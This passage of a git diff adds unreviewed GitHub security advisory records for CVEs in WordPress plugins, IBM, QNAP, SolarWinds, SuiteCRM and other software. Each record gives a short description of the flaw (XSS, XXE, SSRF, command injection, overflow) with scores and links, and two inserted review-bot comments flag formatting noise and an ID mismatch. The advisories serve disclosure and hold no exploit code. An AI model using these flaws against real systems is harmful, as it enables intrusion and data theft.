+ "id": "GHSA-gc37-v9fg-72xc",
+ "modified": "2024-02-02T18:30:33Z",
+ "published": "2024-02-02T18:30:33Z",
+ "aliases": [
+ "CVE-2024-1188"
+ ],
+ "details": "A vulnerability, which was classified as problematic, was found in Rizone Soft Notepad3 1.0.2.350. Affected is an unknown function of the component Encryption Passphrase Handler. The manipulation leads to denial of service. Attacking locally is a requirement. The exploit has been disclosed to the public and may be used. VDB-252678 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1188"
+ },
+ {
+ "type": "WEB",
+ "url": "https://fitoxs.com/vuldb/14-exploit-perl.txt"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.252678"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.252678"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-404"
+ ],
+ "severity": "LOW",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-02T18:15:32Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-gccr-qg9r-6mhw/GHSA-gccr-qg9r-6mhw.json b/advisories/unreviewed/2024/02/GHSA-gccr-qg9r-6mhw/GHSA-gccr-qg9r-6mhw.json
new file mode 100644
index 0000000000000..a76464acfac7d
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-gccr-qg9r-6mhw/GHSA-gccr-qg9r-6mhw.json
@@ -0,0 +1,46 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-gccr-qg9r-6mhw",
+ "modified": "2024-02-04T03:30:23Z",
+ "published": "2024-02-04T03:30:23Z",
+ "aliases": [
+ "CVE-2023-50947"
+ ],
+ "details": "IBM Business Automation Workflow 22.0.2, 23.0.1, and 23.0.2 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 275665.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-50947"
+ },
+ {
+ "type": "WEB",
+ "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/275665"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.ibm.com/support/pages/node/7114419"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.ibm.com/support/pages/node/7114430"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-04T01:15:25Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-gf24-7549-v36h/GHSA-gf24-7549-v36h.json b/advisories/unreviewed/2024/02/GHSA-gf24-7549-v36h/GHSA-gf24-7549-v36h.json
new file mode 100644
index 0000000000000..af1c343b6e9ea
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-gf24-7549-v36h/GHSA-gf24-7549-v36h.json
@@ -0,0 +1,42 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-gf24-7549-v36h",
+ "modified": "2024-02-06T00:30:27Z",
+ "published": "2024-02-06T00:30:27Z",
+ "aliases": [
+ "CVE-2024-0509"
+ ],
+ "details": "The WP 404 Auto Redirect to Similar Post plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘request’ parameter in all versions up to, and including, 1.0.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0509"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset/3031134/wp-404-auto-redirect-to-similar-post/trunk/includes/ajax.php"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/6eef5549-3f89-4d6f-8c4e-6e4ee6082042?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-05T22:16:02Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-gf96-mx4m-x82f/GHSA-gf96-mx4m-x82f.json b/advisories/unreviewed/2024/02/GHSA-gf96-mx4m-x82f/GHSA-gf96-mx4m-x82f.json
new file mode 100644
index 0000000000000..7a414be16c7fc
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-gf96-mx4m-x82f/GHSA-gf96-mx4m-x82f.json
@@ -0,0 +1,35 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-gf96-mx4m-x82f",
+ "modified": "2024-02-02T12:30:30Z",
+ "published": "2024-02-02T12:30:30Z",
+ "aliases": [
+ "CVE-2023-39611"
+ ],
+ "details": "An issue in Software FX Chart FX 7 version 7.0.4962.20829 allows attackers to enumerate and read files from the local filesystem by sending crafted web requests.",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-39611"
+ },
+ {
+ "type": "WEB",
+ "url": "https://medium.com/%40arielbreisacher/my-chart-fx-7-software-investigation-journey-leading-to-a-directory-traversal-vulnerability-067cdcd3f2e9"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-02T10:15:08Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-gfhx-2xqr-982p/GHSA-gfhx-2xqr-982p.json b/advisories/unreviewed/2024/02/GHSA-gfhx-2xqr-982p/GHSA-gfhx-2xqr-982p.json
new file mode 100644
index 0000000000000..f09b3c1535c41
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-gfhx-2xqr-982p/GHSA-gfhx-2xqr-982p.json
@@ -0,0 +1,35 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-gfhx-2xqr-982p",
+ "modified": "2024-02-07T15:30:48Z",
+ "published": "2024-02-07T15:30:48Z",
+ "aliases": [
+ "CVE-2024-24131"
+ ],
+ "details": "SuperWebMailer v9.31.0.01799 was discovered to contain a reflected cross-site scripting (XSS) vulenrability via the component api.php.",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24131"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/Hebing123/cve/issues/14"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-07T14:15:52Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-gfj2-m63m-4q89/GHSA-gfj2-m63m-4q89.json b/advisories/unreviewed/2024/02/GHSA-gfj2-m63m-4q89/GHSA-gfj2-m63m-4q89.json
new file mode 100644
index 0000000000000..77032fb9fd13c
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-gfj2-m63m-4q89/GHSA-gfj2-m63m-4q89.json
@@ -0,0 +1,42 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-gfj2-m63m-4q89",
+ "modified": "2024-02-06T00:30:27Z",
+ "published": "2024-02-06T00:30:27Z",
+ "aliases": [
+ "CVE-2024-1092"
+ ],
+ "details": "The RSS Aggregator by Feedzy – Feed to Post, Autoblogging, News & YouTube Video Feeds Aggregator plugin for WordPress is vulnerable to unauthorized data modification due to a missing capability check on the feedzy dashboard in all versions up to, and including, 4.4.1. This makes it possible for authenticated attackers, with contributor access or higher, to create, edit or delete feed categories created by them.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1092"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3030538%40feedzy-rss-feeds%2Ftrunk&old=3028200%40feedzy-rss-feeds%2Ftrunk&sfp_email=&sfph_mail="
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/98053141-fe97-4bd4-b820-b6cca3426109?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-05T22:16:07Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-gg63-hgm5-v538/GHSA-gg63-hgm5-v538.json b/advisories/unreviewed/2024/02/GHSA-gg63-hgm5-v538/GHSA-gg63-hgm5-v538.json
new file mode 100644
index 0000000000000..b893b112d3030
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-gg63-hgm5-v538/GHSA-gg63-hgm5-v538.json
@@ -0,0 +1,42 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-gg63-hgm5-v538",
+ "modified": "2024-02-03T03:30:27Z",
+ "published": "2024-02-03T03:30:27Z",
+ "aliases": [
+ "CVE-2023-32327"
+ ],
+ "details": "IBM Security Access Manager Container (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.0.0 through 10.0.6.1) is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 254783.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-32327"
+ },
+ {
+ "type": "WEB",
+ "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/254783"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.ibm.com/support/pages/node/7106586"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-611"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-03T01:15:08Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-gh68-jm46-84rf/GHSA-gh68-jm46-84rf.json b/advisories/unreviewed/2024/02/GHSA-gh68-jm46-84rf/GHSA-gh68-jm46-84rf.json
new file mode 100644
index 0000000000000..509eeb9286bba
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-gh68-jm46-84rf/GHSA-gh68-jm46-84rf.json
@@ -0,0 +1,35 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-gh68-jm46-84rf",
+ "modified": "2024-02-04T21:30:43Z",
+ "published": "2024-02-04T21:30:43Z",
+ "aliases": [
+ "CVE-2023-52425"
+ ],
+ "details": "libexpat through 2.5.0 allows a denial of service (resource consumption) because many full reparsings are required in the case of a large token for which multiple buffer fills are needed.",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-52425"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/libexpat/libexpat/pull/789"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-04T20:15:46Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-ghjj-5h83-xf6v/GHSA-ghjj-5h83-xf6v.json b/advisories/unreviewed/2024/02/GHSA-ghjj-5h83-xf6v/GHSA-ghjj-5h83-xf6v.json
new file mode 100644
index 0000000000000..23658496de905
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-ghjj-5h83-xf6v/GHSA-ghjj-5h83-xf6v.json
@@ -0,0 +1,42 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-ghjj-5h83-xf6v",
+ "modified": "2024-02-07T03:30:33Z",
+ "published": "2024-02-07T03:30:33Z",
+ "aliases": [
+ "CVE-2023-6388"
+ ],
+ "details": "Suite CRM version 7.14.2 allows making arbitrary HTTP requests through\n\nthe vulnerable server. This is possible because the application is vulnerable\n\nto SSRF.\n\n\n\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6388"
+ },
+ {
+ "type": "WEB",
+ "url": "https://fluidattacks.com/advisories/leon/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/salesagility/SuiteCRM/"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-918"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-07T03:15:49Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-gj6f-cjc7-f9fg/GHSA-gj6f-cjc7-f9fg.json b/advisories/unreviewed/2024/02/GHSA-gj6f-cjc7-f9fg/GHSA-gj6f-cjc7-f9fg.json
new file mode 100644
index 0000000000000..b788e4f6ba609
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-gj6f-cjc7-f9fg/GHSA-gj6f-cjc7-f9fg.json
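Review bot: The `details` value embeds hard line breaks mid-sentence (`through\n\nthe vulnerable server`) and ends in a run of five `\n`, which is import noise rather than content and renders as stray blank lines wherever the description is shown. Normalising whitespace on import — collapsing internal `\n\n` to a space and stripping leading/trailing newlines — would keep the text faithful to the source while making it readable. The same pattern appears in GHSA-gm68-3cj6-qp9p (trailing `\n\n`), GHSA-gqfw-9432-p6cq (a leading `\n` before the first word) and GHSA-gwp7-vjfg-ffh8 (eight trailing `\n`), so a single fix in the exporter would cover all of them.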
@@ -0,0 +1,42 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-gj6f-cjc7-f9fg",
+ "modified": "2024-02-06T00:30:26Z",
+ "published": "2024-02-06T00:30:26Z",
+ "aliases": [
+ "CVE-2023-6700"
+ ],
+ "details": "The Cookie Information | Free GDPR Consent Solution plugin for WordPress is vulnerable to arbitrary option updates due to a missing capability check on its AJAX request handler in versions up to, and including, 2.0.22. This makes it possible for authenticated attackers, with subscriber-level access or higher, to edit arbitrary site options which can be used to create administrator accounts.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6700"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset/3028096/wp-gdpr-compliance/trunk?contextall=1&old=2865555&old_path=%2Fwp-gdpr-compliance%2Ftrunk"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/42a4ef37-c842-4925-b06a-3e6423337567?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-05T22:15:56Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-gj9j-vqjp-c845/GHSA-gj9j-vqjp-c845.json b/advisories/unreviewed/2024/02/GHSA-gj9j-vqjp-c845/GHSA-gj9j-vqjp-c845.json
new file mode 100644
index 0000000000000..4f61cc44c9209
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-gj9j-vqjp-c845/GHSA-gj9j-vqjp-c845.json
@@ -0,0 +1,42 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-gj9j-vqjp-c845",
+ "modified": "2024-02-07T18:30:26Z",
+ "published": "2024-02-01T21:30:31Z",
+ "aliases": [
+ "CVE-2024-24041"
+ ],
+ "details": "A stored cross-site scripting (XSS) vulnerability in Travel Journal Using PHP and MySQL with Source Code v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the location parameter at /travel-journal/write-journal.php.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24041"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/tubakvgc/CVE/blob/main/Travel_Journal_App.md"
+ },
+ {
+ "type": "WEB",
+ "url": "https://portswigger.net/web-security/cross-site-scripting"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-01T20:50:05Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-gm68-3cj6-qp9p/GHSA-gm68-3cj6-qp9p.json b/advisories/unreviewed/2024/02/GHSA-gm68-3cj6-qp9p/GHSA-gm68-3cj6-qp9p.json
new file mode 100644
index 0000000000000..ac97e8c1861e6
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-gm68-3cj6-qp9p/GHSA-gm68-3cj6-qp9p.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-gm68-3cj6-qp9p",
+ "modified": "2024-02-05T09:30:28Z",
+ "published": "2024-02-05T09:30:28Z",
+ "aliases": [
+ "CVE-2024-23196"
+ ],
+ "details": "A race condition was found in the Linux kernel's sound/hda device driver in snd_hdac_regmap_sync() function. This can result in a null pointer dereference issue, possibly leading to a kernel panic or denial of service issue.\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:C/C:N/I:N/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23196"
+ },
+ {
+ "type": "WEB",
+ "url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=8148"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-362"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-05T08:15:44Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-gp9c-7r9h-x95g/GHSA-gp9c-7r9h-x95g.json b/advisories/unreviewed/2024/02/GHSA-gp9c-7r9h-x95g/GHSA-gp9c-7r9h-x95g.json
new file mode 100644
index 0000000000000..c63344c2a9933
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-gp9c-7r9h-x95g/GHSA-gp9c-7r9h-x95g.json
@@ -0,0 +1,42 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-gp9c-7r9h-x95g",
+ "modified": "2024-02-07T18:30:27Z",
+ "published": "2024-02-07T18:30:27Z",
+ "aliases": [
+ "CVE-2023-32328"
+ ],
+ "details": "IBM Security Verify Access 10.0.0.0 through 10.0.6.1 uses insecure protocols in some instances that could allow an attacker on the network to take control of the server. IBM X-Force Id: 254957.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-32328"
+ },
+ {
+ "type": "WEB",
+ "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/254657"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.ibm.com/support/pages/node/7106586"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-319"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-07T17:15:08Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-gq9v-6frh-4qfx/GHSA-gq9v-6frh-4qfx.json b/advisories/unreviewed/2024/02/GHSA-gq9v-6frh-4qfx/GHSA-gq9v-6frh-4qfx.json
new file mode 100644
index 0000000000000..b7ad3ede4d0c9
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-gq9v-6frh-4qfx/GHSA-gq9v-6frh-4qfx.json
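Review bot: The X-Force identifier in `details` (`IBM X-Force Id: 254957`) does not match the one in the reference URL (`.../vulnerabilities/254657`); one of the two digits is presumably a transposition, and as written a reader following the link may land on a different X-Force record than the description names. The sibling advisory GHSA-gg63-hgm5-v538 for CVE-2023-32327 uses the same ID (254783) in both places, which suggests the mismatch here is a data error rather than a convention. Confirm against the IBM support page already listed in `references` and align the two values, or drop the X-Force reference until it is verified.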
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-gq9v-6frh-4qfx",
+ "modified": "2024-02-02T18:30:31Z",
+ "published": "2024-02-02T18:30:31Z",
+ "aliases": [
+ "CVE-2023-45036"
+ ],
+ "details": "A buffer copy without checking size of input vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow authenticated administrators to execute code via a network.\n\nWe have already fixed the vulnerability in the following versions:\nQTS 5.1.3.2578 build 20231110 and later\nQuTS hero h5.1.3.2578 build 20231110 and later\nQuTScloud c5.1.5.2651 and later\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45036"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.qnap.com/en/security-advisory/qsa-23-46"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-120"
+ ],
+ "severity": "LOW",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-02T16:15:51Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-gqfw-9432-p6cq/GHSA-gqfw-9432-p6cq.json b/advisories/unreviewed/2024/02/GHSA-gqfw-9432-p6cq/GHSA-gqfw-9432-p6cq.json
new file mode 100644
index 0000000000000..9cb83c292e89a
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-gqfw-9432-p6cq/GHSA-gqfw-9432-p6cq.json
@@ -0,0 +1,42 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-gqfw-9432-p6cq",
+ "modified": "2024-02-06T18:30:20Z",
+ "published": "2024-02-06T18:30:20Z",
+ "aliases": [
+ "CVE-2023-50395"
+ ],
+ "details": "\nSQL Injection Remote Code Execution Vulnerability was found using an update statement in the SolarWinds Platform. This vulnerability requires user authentication to be exploited",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-50395"
+ },
+ {
+ "type": "WEB",
+ "url": "https://documentation.solarwinds.com/en/success_center/orionplatform/content/release_notes/solarwinds_platform_2024-1_release_notes.htm"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.solarwinds.com/trust-center/security-advisories/CVE-2023-50395"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-89"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-06T16:15:51Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-grjc-q3pp-wg86/GHSA-grjc-q3pp-wg86.json b/advisories/unreviewed/2024/02/GHSA-grjc-q3pp-wg86/GHSA-grjc-q3pp-wg86.json
new file mode 100644
index 0000000000000..b18596f2ec979
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-grjc-q3pp-wg86/GHSA-grjc-q3pp-wg86.json
@@ -0,0 +1,35 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-grjc-q3pp-wg86",
+ "modified": "2024-02-05T06:30:31Z",
+ "published": "2024-02-05T06:30:31Z",
+ "aliases": [
+ "CVE-2024-20006"
+ ],
+ "details": "In da, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08477148; Issue ID: ALPS08477148.",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20006"
+ },
+ {
+ "type": "WEB",
+ "url": "https://corp.mediatek.com/product-security-bulletin/February-2024"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-05T06:15:47Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-grjm-vqpg-p65p/GHSA-grjm-vqpg-p65p.json b/advisories/unreviewed/2024/02/GHSA-grjm-vqpg-p65p/GHSA-grjm-vqpg-p65p.json
new file mode 100644
index 0000000000000..440f00cc27fee
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-grjm-vqpg-p65p/GHSA-grjm-vqpg-p65p.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-grjm-vqpg-p65p",
+ "modified": "2024-02-02T18:30:32Z",
+ "published": "2024-02-02T18:30:32Z",
+ "aliases": [
+ "CVE-2023-47566"
+ ],
+ "details": "An OS command injection vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow authenticated administrators to execute commands via a network.\n\nWe have already fixed the vulnerability in the following versions:\nQTS 5.1.5.2645 build 20240116 and later\nQuTS hero h5.1.5.2647 build 20240118 and later\nQuTScloud c5.1.5.2651 and later\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:L/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-47566"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.qnap.com/en/security-advisory/qsa-24-04"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-78"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-02T16:15:52Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-gvhv-g3h5-f6r7/GHSA-gvhv-g3h5-f6r7.json b/advisories/unreviewed/2024/02/GHSA-gvhv-g3h5-f6r7/GHSA-gvhv-g3h5-f6r7.json
new file mode 100644
index 0000000000000..d34d7ecb13971
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-gvhv-g3h5-f6r7/GHSA-gvhv-g3h5-f6r7.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-gvhv-g3h5-f6r7",
+ "modified": "2024-02-06T03:33:00Z",
+ "published": "2024-02-06T03:33:00Z",
+ "aliases": [
+ "CVE-2024-20823"
+ ],
+ "details": "Implicit intent hijacking vulnerability in SamsungAccount of Galaxy Store prior to version 4.5.63.6 allows local attackers to access sensitive information via implicit intent.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20823"
